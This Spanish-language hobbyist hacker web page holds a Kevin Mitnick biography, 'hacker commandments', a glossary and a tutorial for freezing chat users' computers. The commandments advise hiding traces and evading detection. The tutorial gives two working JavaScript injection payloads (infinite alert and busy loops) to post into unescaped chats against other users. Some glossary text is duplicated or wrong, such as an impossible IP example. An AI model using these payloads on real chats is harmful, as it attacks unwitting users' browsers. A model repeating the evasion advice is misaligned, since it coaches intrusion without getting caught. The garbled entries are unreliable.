Kevin descubrió y reveló información de alta seguridad perteneciente al FBI, incluyendo cintas del consulado de Israel, en Los Angeles. Sus incursiones costaron millones de dólares al FBI y al gobierno norteamericano y obligó a este departamento policial a mudar sus centros secretos de comunicación a sitios inaccesibles.
Mitnick, quién fue liberado en Enero del 2000, después de permanecer casi 5 años en un prisión federal, le costó al estado norteamericano y a empresas privadas, millones de dólares al ser objeto de hurto de su software, información y alteración de los datos de las mismas. Entre los agraviados se incluyen corporaciones tales como Motorola, Novell, Nokia y Sun Microsystems, el FBI, el Pentágono y la Universidad de Southern California.
El se convirtió en un símbolo entre la comunidad internacional de hackers, después de que el FBI lo investigara y persiguiera infructuosamente durante tres años, y cuya captura se produjo en 1995, cuando los investigadores rastrearon sus huellas hasta llegar a un departamento en Raleigh, en Carolina del Norte.
Bajo un acuerdo de petición de clemencia, la Juez del U.S. District, Mariana Pfaelzer prohibió a Mitnick a acceder a computadoras, teléfonos celulares, televisión o cualquier equipo electrónico que pudiese ser usado en Internet. La Juez pensó que Mitnick no estaría en condiciones de obtener ningún recurso económico por encima del salario mínimo.
Sin embargo, un reciente reporte en Internet informó que Mitnick había ganado $20,000 por concepto de dictado de conferencias sobre seguridad en Internet, en diversos foros.
MaNdAmIeNtOs DeL HaCkEr
1.) Nunca dañes algo intencionadamente. Lo único que
conseguirás será buscarte problemas.
2.) Modifica sólo lo estrictamente necesario paraentrar y para evitar ser localizado, o para poder
acceder otras veces.
3.) No hackees nunca por venganza ni por intereses
personales o económicos.
4.) No hackees sistemas pobres que no puedan reponerse
de un ataque fuerte. Ni tampoco sistemas muy ricos o
grandes que puedan permitirse gastar dinero y tiempo
en buscarte.
5.) Odia a Telefónica pero no te metas con ella.
6.) No hackees ordenadores del gobierno (el gran
hermano te observa). Tal vez sean más emocionantes,
pero no olvides que la policía trabaja para ellos.
7.) No comentes con nadie, a menos que sea de total
confianza, tus azañas (los mas grandes hackers de la
historia han sido cazados debido a las confesiones de
sus novias).
8.) Cuando hables en BBS o por Internet, procura ser
lo más discreto posible. Todo lo que digas quedará
almacenado.
9.) Se paranoico. Una de las características
principales de los mejores hackers es la paranoia.
10.) No dejes ningún dato que pueda relacionarse
contigo en los ordenadores que hackees. Y si es
posible, ni siquiera "firmes".
11.) Estudia mucho antes de lanzarte a la práctica.
Ten en cuenta que eres un total novato y si te
encuentras con problemas probablemente tu aventura
acabe antes de empezar.
12.) Nunca dejes de estudiar y de aprender cosas
nuevas, el mundo de la informática avanza rápidamente,
y es necesario mantener un buen ritmo si no quieres
quedarte atrás.
Algunos de estos consejos te parecerán anticuados o
estúpidos, pero la mayoría tienen un doble objetivo.
Mantener limpio el maltratado nombre de los hackers y
evitarte problemas con la justicia.
VOCABULARIO HACKER
Ancho de banda:
(Bandwith) Término técnico que determina el volumen de información que puede circular por un medio físico, de comunicación de datos, es decir, la capacidad de una conexión. A mayor ancho de banda, mejor velocidad de acceso; más personas pueden utilizar el mismo medio simultáneamente. Se mide en Hertz o(Bandwith) Término técnico que determina el volumen de información que puede circular por un medio físico, de comunicación de datos, es decir, la capacidad de una conexión. A mayor ancho de banda, mejor velocidad de acceso; más personas pueden utilizar el mismo medio bps (Bits por segundo), por ejemplo 32 kbps, 64 kbps, 1Mbps, etc.
Banner:
Aviso publicitario que ocupa parte de una página Web, en general ubicado en la parte superior al centro. Haciendo un click sobre él, se puede llegar al sitio del anunciante. De este modo, los banners en general se cobran en base a los click-throughs que se obtienen.
Cookies: (Galletitas) Pequeños archivos con datos que algunos sitios Web depositan en formaautomática en las computadoras de los visitantes. Lo hacen con el objetivo de almacenar allí información sobre las personas y sus preferencias. Por ejemplo, la primera vez que un navegante visita un site y completa un formulario con sus datos y perfil, el sistema podrá enviarle una cookie al asignarle una identificación. Cuando el usuario retorne, el sitio Web pedirá a la computadora cliente la cookie y, a través de ella, lo recononocerá. Cortafuegos: (Firewall): Computadora que registra todos los paquetes de información que entran en una compañia para, una vez verificados, derivarlos a otra que tiene conexión interna y norecibe archivos que no provengan de aquella. Es como un envudo que mira si lainformación que desea entrar a un servidor tiene permiso para ello o no. Los hackers se las tienes que apañar para entrar ya sea buscando un bug (error de diseño) o mediante algun programa que le permita encontrar alguna clave válida. Dirección Ip: La dirección Ip de una máquina conectada a Internet es un número que identifica unívocamente a esa máquina (Es decir, tan sólo esa máquina tiene ese número). Las direcciones Ip constan de cuatro números que van del 0 al 255, y que se representan por dígitos decimales separados por puntos, como 123.456.1.1 Como estos números son difícilesde recordar, a cada máquina se le asigna también un nombre, su nombre de dominio. Dominio: El dominio, o más propiamente nombre de dominio, es uno de los conceptos básicos de Internet. Está muy relacionado con las direcciones Ip, y su función es identificarunívocamente cada máquina conectada a Internet con un nombre que sea más fácil de recordar (Para un humano) que una dirección Ip. Un nombre de dominio está compuesto de varias partes que suelen dar una idea de la localización física de la máquina. Formatos: Se les llama formatos generalmente a cada tipo de archivo, por ejemplo a los de gráficoscomo ".jpg, .gif", etc. Frame: (Cuadros) Instrucciones en el lenguaje Html (Utilizado para diseñar las páginas Web); una forma de dividir la pantalla del navegante en varias zonas, cada una con autonomía de movimiento. Por ejemplo, se puede dividir una pantalla de modo que haya un frame vertical que ocupe el lado izquierdo de la pantalla durante toda la navegación que contenga el menú de un sitio Web. Los frames son un agregado al Html estándar inventado por la empresa Netscape y luego adoptados como norma. Pgp: Siglas del programa Pretty Good Privacy (Privacidad muy buena). Está considerado el mejorprograma de encriptación de correo electrónico para Internet y utiliza una combinación de claves públicas y privadas de hasta 2048 bits en su modalidad avanzada. El programa trata de aplicar algoritmos de encriptado a cada byte del fichero que vamos a enviar, con una clave de 128 bits o más, de forma que el resultado es un conjunto de caracteres incomprensibles. Una vez codificado, el fichero sólo se puede decodificar con la clave opuesta a la que se ha utilizado. Si queremos mandar un mensaje codificado para que sólo pueda abrirlo su destinatario legítimo, debemos encriptarlo con su clave pública y asísólo se podrá abrir con la clave privada. Al revés, si queremos mandar un mensaje deforma que sólo lo hayamos podido mandar nosotros, debemos codificarlo con nuestra claveprivada y el destinatario usará nuestra clave privada para abrirlo. A diferencia de la firma, este sistema esconde el contenido del mensaje y lo hace inalterable.
************* CÓMO BLOQUEAR ORDENADORES A TRAVÉS DE LOS CHATS**************
Con lo que voy a explicar a continuación podréis tener un chat bajo
control, podréis hacer lo que querais con los usuarios que estén
conectados.
Podréis bloquear los ordenadores de los usuarios que estén conectados en
ese momento al chat (ya sabes, bloquear el ordenador de ese capullo que
siempre va molestando y haciendo el imbécil).
----------------------------------------------------------------------------
QUÉ ES LO QUE BLOQUEA EL ORDENADOR DEL USUARIO?
----------------------------------------------------------------------------
Lo que provoca este hecho es un sencillísimo programa hecho en JAVASCRIPT
(tan solo son un par de líneas, pero muy eficaces, ya sabes aquello de
pequeño pero matón).
El programa que bloquea el ordenador, en realidad son dos, y cada uno
produce (más o menos) lo mismo pero de distinta manera, esto lo explico
en
el siguiente apartado.
----------------------------------------------------------------------------
EL PROGRAMA QUE BLOQUEA EL ORDENADOR DEL USUARIO
----------------------------------------------------------------------------
Como ya he dicho antes hay dos progrmas que son estos:
1) <script language=javascript> for(i=1; i<2;){ alert("texto") }</script>
2) <script language=javascript>a=1; for(i=1; i<2;){a=a+1}</script>
El número dos lo que provoca es un bucle que se repite a si mismo un
número de veces determinado y que en tiempo se traduce en unos 30 ó 45
segundos dependiendo del procesador de la máquina. Transcurrido este
tiempo volverá a salir otro mensaje esta vez del propio navegador y
despues de este volverá la normalidad.
La ventaja de este programa es que mientras se está leyendo el bucle, el
ordenador queda totalmente inoperativo y no se puede hacer nada de nada.
La desventaja es que en los futuros navegadores es posible que no se
produzca este bucle, las razones son técnicas y no creo que valga la pena
expicarlas además del tiempo que nos llevaría. Y la otra desventaja es
que dependiendo del sistema operativo que se use se puede anular este
bucle manualmente.
El número uno lo que provoca es un bucle que se repite a si mismo
indefinidamente haciendo imposible que se pueda salir de el, por lo que
el ordenador del usuario leerá una y otra vez este bucle y no podrá salir
de él.
En el lugar donde pone texto será el mensaje que le saldrá al usuario una
y otra vez. Así que sustituye el (texto) por el mensaje que quieras.
La ventaja de este programa es que el funcionamiento está casi
garantizado ante la llegada de futuros navegadores más modernos, y la
desventaja (aunque yo no diria desventaja) es que el ordenador no queda
totalmente inoperativo, lo único que queda inoperativo es el navegador o
la ventana del navegador.
* NOTA: estos dos programas no funcionan en el 100% de los chats,
dependiendo del CGI que usen estos chats, para ver si funcionarian estos
programas en el chat que desees, escribe el símbolo "<", si luego ves que
no ha salido o que ha salido otro caracter en su lugar quiere decir que
estos programas no funcionarán en ese chat, entonces más vale que no lo
intentes, hazme caso y si te ocurre esto no lo intentes.
* IMPORTANTE: cuando escribas estos programas en el chat y pulses el
botón de enviar, estos se ejecutarán a todos los usuarios que estén
conectados (excepto en los chats que se pueden mandar a una sola persona)
en cualquiera de los dos casos, estos programas también se ejecutarán en
tu computadora, cosa que nos fastidiaria mucho porque también se nos
bloquearia a el ordenador a nosotros, entonces lo que se puede hacer son
muchas cosas, la más sencilla es, o bien mirar en el Trumpet y vigilar a
ver cuando nuestro mensaje es enviado por el módem (cosa un poco
complicada si no se tiene un poco de idea), o bien pulsar el botón de
"Enviar" propio del chat y esperar a que la pantalla se ponga en blanco
(esto significa que se ha borrado toda la pantalla para cargarla de nuevo
con los mensajes actualizados) entonces pulsar Stop. También hay otras
técnicas mejores pero también más difíiles de hacer, y que no voy a
explicar ahora.
Ya se que algunos de vosotros esto último que acabo de explicar puede que
no lo entendais, entonces lo mejor que podéis hacer es probarlo sin tener
en cuanta lo que he explicado en la nota de "IMPORTANTE", después de
hacerlo ya vereis como lo entendereis.
CoNeCtAr A FtP´S PoR MS-DoS (esto no es JuAnKeAr)
- Abre el MS-DOS
- Pon FTP(ENTER)
- Pon "open aqui_el_site_ftp"(ENTER)
- pon en user el "user" del ftp(ENTER)
- Pon en password el "password" del FTP(ENTER)
- Si es binario (linux) pues pon "bin"(ENTER)
- Ahora para descargarte lo que quieras pon "get nombre_del_archivo a descargar" por ejemplo "get text.txt"(ENTER)
- Ya esta ahora lo que te estés descargando si tienes WINDOWS estará en C:\
- Ya está ahora para cerrar la conexion solo debes de poner "EXIT"
GrAcIaS PoR LeeR EsTÁ WeB...
LoAdInG...